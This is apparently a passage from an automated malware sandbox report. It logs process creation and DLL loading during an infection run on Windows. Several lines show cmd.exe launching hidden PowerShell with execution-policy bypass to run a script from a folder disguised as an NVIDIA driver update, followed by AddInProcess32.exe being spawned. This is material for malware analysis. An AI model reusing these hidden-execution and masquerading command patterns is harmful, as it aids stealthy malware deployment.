                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: comsvcs.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
